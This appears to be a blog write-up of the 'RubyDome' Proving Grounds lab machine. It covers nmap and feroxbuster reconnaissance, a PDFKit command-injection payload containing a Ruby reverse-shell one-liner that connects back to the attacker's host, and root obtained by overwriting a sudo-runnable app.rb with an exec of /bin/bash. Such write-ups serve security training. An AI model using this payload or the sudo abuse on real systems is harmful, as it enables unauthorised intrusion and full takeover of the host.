Table of contents

  1. RubyDome Proving Grounds
  2. initial Recon
  3. NMap
  4. Ferox
  5. Initial access
  6. Privilege Escalation
RubyDome Proving Grounds RubyDome Proving Grounds

RubyDome Proving Grounds

11/18/2025 / 7 minutes to read / Tags: Proving Grounds, Linux, user enumeration, writeup

initial Recon

NMap

Terminal window
nmap -p- -PS 192.168.157.22 -v -T4 -oN pingscan.txt
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-18 20:56 EET
Initiating Ping Scan at 20:56


Host is up (0.050s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
3000/tcp open  ppp
Terminal window
nmap -p 3000 -sC -sV 192.168.157.22 -v -T4 -oN port3000


PORT     STATE SERVICE VERSION
3000/tcp open  http    WEBrick httpd 1.7.0 (Ruby 3.0.2 (2021-07-07))
| http-methods:
|_  Supported Methods: GET HEAD
|_http-server-header: WEBrick/1.7.0 (Ruby/3.0.2/2021-07-07)
|_http-title: RubyDome HTML to PDF

Ferox

Terminal window
feroxbuster -u http://192.168.157.22:3000/ -k -C 404 400 302 -o feroxFuZZ.txt




 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher πŸ€“                 ver: 2.11.0
───────────────────────────┬──────────────────────
 🎯  Target Url            β”‚ http://192.168.157.22:3000/
 πŸš€  Threads               β”‚ 50
 πŸ“–  Wordlist              β”‚ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 πŸ’’  Status Code Filters   β”‚ [404, 400, 302]
 πŸ’₯  Timeout (secs)        β”‚ 7
 🦑  User-Agent            β”‚ feroxbuster/2.11.0
 πŸ’‰  Config File           β”‚ /etc/feroxbuster/ferox-config.toml
 πŸ”Ž  Extract Links         β”‚ true
 πŸ’Ύ  Output File           β”‚ feroxFuZZ.txt
 🏁  HTTP methods          β”‚ [GET]
 πŸ”“  Insecure              β”‚ true
 πŸ”ƒ  Recursion Depth       β”‚ 4
 πŸŽ‰  New Version Available β”‚ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menuβ„’
──────────────────────────────────────────────────
404      GET       21l       37w        -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET       22l       54w      775c http://192.168.157.22:3000/
[####################] - 83s    30001/30001   0s      found:1       errors:0
[####################] - 83s    30000/30000   362/s   http://192.168.157.22:3000/

image.png

Based on the picture we havea page that converts pages to PDF

When a random address is given the follwoing error is thown:

image.png

Searched for exploit and found the following one:

https://github.com/shamo0/PDFkit-CMD-Injection

Initial access

Specifically the exploit works when a POST request is made in this specific case to pdf that sends the following payload:

Terminal window
url=http%3A%2F%2FLOCAL-ADDRESS%3ALOCAL-PORT%2F%3Fname%3D%2520%60+ruby+-rsocket+-e%27spawn%28%22sh%22%2C%5B%3Ain%2C%3Aout%2C%3Aerr%5D%3D%3ETCPSocket.new%28%22LOCAL-ADDRESS%22%2CLOCAL-PORT%29%29%27%60'

Upon editing the payload and specifing the needed addresses a reverse shell is gotten with the following request:

image.png

and the result:

image.png

followed with the user flag:

image.png

Privilege Escalation

When sudo -l is called it’s shown that the user andrew can run:

Terminal window
sudo /usr/bin/ruby /home/andrew/app/app.rb

Upon checking the file it contains the home page of the file.

The user has rights to read and write the file

image.png

With that cleared the file was manipulated and changed with:

Terminal window
echo 'exec "/bin/bash"' > /home/andrew/app/app.rb

Afterwards the command

Terminal window
sudo /usr/bin/ruby /home/andrew/app/app.rb

Was executed which granted root access

← Back to blog